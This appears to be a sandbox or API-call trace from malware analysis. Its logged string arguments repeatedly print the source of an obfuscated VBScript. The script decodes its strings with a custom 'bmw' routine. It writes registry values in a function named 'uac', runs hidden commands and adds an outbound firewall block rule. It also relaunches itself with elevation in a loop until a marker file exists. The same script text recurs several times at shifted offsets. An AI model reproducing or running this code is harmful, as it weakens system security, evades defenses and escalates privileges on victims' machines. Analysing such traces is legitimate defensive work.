bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.963] wcsncmp (_String1="d(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.963] wcsncmp (_String1="(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.963] wcsncmp (_String1="s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.963] wcsncmp (_String1="1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 